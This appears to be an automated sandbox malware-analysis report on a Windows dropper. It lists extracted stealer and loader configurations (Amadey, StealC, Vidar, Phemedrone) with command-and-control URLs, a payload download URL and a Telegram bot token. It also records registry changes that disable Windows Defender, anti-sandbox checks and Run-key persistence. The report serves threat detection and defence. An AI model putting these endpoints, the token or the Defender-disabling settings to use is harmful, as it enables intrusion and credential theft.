Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
05/03/2025, 17:05
Static task
static1
Behavioral task
behavioral1
Sample
c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe
Resource
win10v2004-20250217-en
General
-
Target
c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe
-
Size
938KB
-
MD5
49b60f16af6a6028755c86cad74bb4ee
-
SHA1
a94d538bebbbcf138c9116f5201009ae14d9c773
-
SHA256
c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67
-
SHA512
dd120b906b034e837c1ede550f5b6d9afdb045ba50aef3cff87473cccd96b51827b2477e3fcb1b8658c5926adb2deaa0f26706dc30f97a6b9fb841f46ff2d314
-
SSDEEP
24576:VqDEvCTbMWu7rQYlBQcBiT6rprG8a0su:VTvC/MTQYxsWR7a0s
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
phemedrone
https://api.telegram.org/bot8073216408:AAGdXWcCmxBIngZx-Z502Gat9NRWpLvPTxU/sendDocument
Extracted
litehttp
v1.0.9
http://185.208.156.162/page.php
-
key
v1d6kd29g85cm8jp4pv8tvflvg303gbl
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Extracted
vidar
ir7am
https://t.me/l793oy
https://steamcommunity.com/profiles/76561199829660832
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
Signatures
-
Amadey family
-
Detect Vidar Stealer 2 IoCs
resource yara_rule behavioral2/memory/5424-1084-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/5424-1085-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/3640-864-0x0000000000280000-0x00000000006EC000-memory.dmp healer behavioral2/memory/3640-865-0x0000000000280000-0x00000000006EC000-memory.dmp healer behavioral2/memory/3640-947-0x0000000000280000-0x00000000006EC000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Litehttp family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 6e8628d5ac.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 6e8628d5ac.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 6e8628d5ac.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 6e8628d5ac.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 6e8628d5ac.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 6e8628d5ac.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 6e8628d5ac.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 6e8628d5ac.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications 6e8628d5ac.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 6e8628d5ac.exe -
Phemedrone
An information and wallet stealer written in C#.
-
Phemedrone family
-
Stealc family
-
Vidar family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 15 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Temp2YURZAHXMW6GXPMYPHN1QK4ALHC41ZV6.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d7fb9061a7.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 45a1ed5133.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ JY4UKYPK97I92KKCAVXZYZOJ5.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempZLDH8CNOMNYHEPT2JKSW6KXTBSAMKUBD.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ cc9ac2900b.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 476de4addb.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 560405edac.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 6e8628d5ac.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d2cf0b8874.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 463d60b86f.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 20 3500 powershell.exe 41 1368 powershell.exe 42 4188 powershell.exe -
pid Process 4960 powershell.exe 3416 powershell.exe 3696 powershell.exe 3500 powershell.exe 1368 powershell.exe 4188 powershell.exe 5636 powershell.exe -
Downloads MZ/PE file 21 IoCs
flow pid Process 113 3244 BitLockerToGo.exe 244 1076 rapes.exe 41 1368 powershell.exe 42 4188 powershell.exe 254 1412 ce4pMzk.exe 38 1076 rapes.exe 38 1076 rapes.exe 38 1076 rapes.exe 38 1076 rapes.exe 38 1076 rapes.exe 38 1076 rapes.exe 38 1076 rapes.exe 38 1076 rapes.exe 38 1076 rapes.exe 38 1076 rapes.exe 38 1076 rapes.exe 38 1076 rapes.exe 89 1896 BitLockerToGo.exe 20 3500 powershell.exe 150 3332 463d60b86f.exe 239 1076 rapes.exe -
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral2/files/0x000a000000023dbb-1074.dat net_reactor behavioral2/memory/5504-1082-0x0000000000560000-0x00000000005C0000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 30 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 463d60b86f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 560405edac.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cc9ac2900b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d2cf0b8874.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 45a1ed5133.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempZLDH8CNOMNYHEPT2JKSW6KXTBSAMKUBD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 476de4addb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion JY4UKYPK97I92KKCAVXZYZOJ5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Temp2YURZAHXMW6GXPMYPHN1QK4ALHC41ZV6.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 560405edac.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempZLDH8CNOMNYHEPT2JKSW6KXTBSAMKUBD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cc9ac2900b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6e8628d5ac.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Temp2YURZAHXMW6GXPMYPHN1QK4ALHC41ZV6.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d7fb9061a7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 45a1ed5133.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion JY4UKYPK97I92KKCAVXZYZOJ5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 476de4addb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 463d60b86f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6e8628d5ac.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d7fb9061a7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d2cf0b8874.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation pDZWk1j.exe Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation pDZWk1j.exe Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation TempZLDH8CNOMNYHEPT2JKSW6KXTBSAMKUBD.EXE Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 35 IoCs
pid Process 3240 TempZLDH8CNOMNYHEPT2JKSW6KXTBSAMKUBD.EXE 1076 rapes.exe 3512 2c6cf18ecd.exe 1944 Temp2YURZAHXMW6GXPMYPHN1QK4ALHC41ZV6.EXE 1992 483d2fa8a0d53818306efeb32d3.exe 1508 d7fb9061a7.exe 2660 pDZWk1j.exe 3824 pDZWk1j.exe 1452 pDZWk1j.exe 852 pDZWk1j.exe 2152 pDZWk1j.exe 4640 xb7PWZwMMv.exe 3624 w6swxRHYtZ.exe 1148 rapes.exe 4500 cc9ac2900b.exe 768 0b10c95dde.exe 4808 0b10c95dde.exe 1572 d2cf0b8874.exe 4684 45a1ed5133.exe 1468 476de4addb.exe 1412 ce4pMzk.exe 1408 rapes.exe 3332 463d60b86f.exe 2508 560405edac.exe 2516 JY4UKYPK97I92KKCAVXZYZOJ5.exe 4724 67b204910f.exe 3640 6e8628d5ac.exe 5404 joblam.exe 3472 pDZWk1j.exe 3504 pDZWk1j.exe 644 gNRpofH56k.exe 3956 jfgGILHp7d.exe 5504 mAtJWNv.exe 5424 mAtJWNv.exe 6060 abVvFvr.exe -
Identifies Wine through registry keys 2 TTPs 15 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine TempZLDH8CNOMNYHEPT2JKSW6KXTBSAMKUBD.EXE Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine d2cf0b8874.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 476de4addb.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine d7fb9061a7.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 45a1ed5133.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 560405edac.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine Temp2YURZAHXMW6GXPMYPHN1QK4ALHC41ZV6.EXE Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine cc9ac2900b.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 463d60b86f.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine JY4UKYPK97I92KKCAVXZYZOJ5.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine 6e8628d5ac.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 6e8628d5ac.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 6e8628d5ac.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10104620121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\463d60b86f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10104920101\\463d60b86f.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\560405edac.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10104930101\\560405edac.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\67b204910f.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10104940101\\67b204910f.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\atle11Vo\\Anubis.exe\"" ce4pMzk.exe Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6e8628d5ac.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10104950101\\6e8628d5ac.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2c6cf18ecd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10104610101\\2c6cf18ecd.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0010000000023bb2-53.dat autoit_exe behavioral2/files/0x0007000000023d83-517.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
pid Process 3240 TempZLDH8CNOMNYHEPT2JKSW6KXTBSAMKUBD.EXE 1076 rapes.exe 1944 Temp2YURZAHXMW6GXPMYPHN1QK4ALHC41ZV6.EXE 1992 483d2fa8a0d53818306efeb32d3.exe 1508 d7fb9061a7.exe 1148 rapes.exe 4500 cc9ac2900b.exe 1572 d2cf0b8874.exe 4684 45a1ed5133.exe 1468 476de4addb.exe 1408 rapes.exe 3332 463d60b86f.exe 2508 560405edac.exe 2516 JY4UKYPK97I92KKCAVXZYZOJ5.exe 3640 6e8628d5ac.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 2660 set thread context of 2152 2660 pDZWk1j.exe 142 PID 768 set thread context of 4808 768 0b10c95dde.exe 153 PID 4500 set thread context of 1896 4500 cc9ac2900b.exe 156 PID 1572 set thread context of 3244 1572 d2cf0b8874.exe 160 PID 3472 set thread context of 3504 3472 pDZWk1j.exe 198 PID 5504 set thread context of 5424 5504 mAtJWNv.exe 205 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempZLDH8CNOMNYHEPT2JKSW6KXTBSAMKUBD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
pid pid_target Process procid_target 3512 2660 WerFault.exe 136 5056 768 WerFault.exe 152 5300 3472 WerFault.exe 196 4584 5504 WerFault.exe 204 -
System Location Discovery: System Language Discovery 1 TTPs 52 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d7fb9061a7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0b10c95dde.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cc9ac2900b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0b10c95dde.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 45a1ed5133.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 476de4addb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 463d60b86f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pDZWk1j.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2c6cf18ecd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pDZWk1j.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pDZWk1j.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d2cf0b8874.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JY4UKYPK97I92KKCAVXZYZOJ5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 67b204910f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pDZWk1j.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 560405edac.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6e8628d5ac.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempZLDH8CNOMNYHEPT2JKSW6KXTBSAMKUBD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Temp2YURZAHXMW6GXPMYPHN1QK4ALHC41ZV6.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 67b204910f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 67b204910f.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4124 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 1996 taskkill.exe 2540 taskkill.exe 4500 taskkill.exe 4460 taskkill.exe 4124 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 672 schtasks.exe 4456 schtasks.exe 3244 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3500 powershell.exe 3500 powershell.exe 3240 TempZLDH8CNOMNYHEPT2JKSW6KXTBSAMKUBD.EXE 3240 TempZLDH8CNOMNYHEPT2JKSW6KXTBSAMKUBD.EXE 1076 rapes.exe 1076 rapes.exe 1368 powershell.exe 1368 powershell.exe 1944 Temp2YURZAHXMW6GXPMYPHN1QK4ALHC41ZV6.EXE 1944 Temp2YURZAHXMW6GXPMYPHN1QK4ALHC41ZV6.EXE 4960 powershell.exe 4960 powershell.exe 4960 powershell.exe 3416 powershell.exe 3416 powershell.exe 3416 powershell.exe 3696 powershell.exe 3696 powershell.exe 3696 powershell.exe 4188 powershell.exe 4188 powershell.exe 1992 483d2fa8a0d53818306efeb32d3.exe 1992 483d2fa8a0d53818306efeb32d3.exe 1508 d7fb9061a7.exe 1508 d7fb9061a7.exe 1508 d7fb9061a7.exe 1508 d7fb9061a7.exe 1508 d7fb9061a7.exe 1508 d7fb9061a7.exe 3624 w6swxRHYtZ.exe 3624 w6swxRHYtZ.exe 1148 rapes.exe 1148 rapes.exe 4500 cc9ac2900b.exe 4500 cc9ac2900b.exe 4808 0b10c95dde.exe 4808 0b10c95dde.exe 4808 0b10c95dde.exe 4808 0b10c95dde.exe 1572 d2cf0b8874.exe 1572 d2cf0b8874.exe 4684 45a1ed5133.exe 4684 45a1ed5133.exe 4684 45a1ed5133.exe 4684 45a1ed5133.exe 4684 45a1ed5133.exe 4684 45a1ed5133.exe 1468 476de4addb.exe 1468 476de4addb.exe 1412 ce4pMzk.exe 1412 ce4pMzk.exe 1412 ce4pMzk.exe 1412 ce4pMzk.exe 1408 rapes.exe 1408 rapes.exe 1468 476de4addb.exe 1468 476de4addb.exe 1468 476de4addb.exe 1468 476de4addb.exe 3332 463d60b86f.exe 3332 463d60b86f.exe 3332 463d60b86f.exe 3332 463d60b86f.exe 3332 463d60b86f.exe -
Suspicious use of AdjustPrivilegeToken 19 IoCs
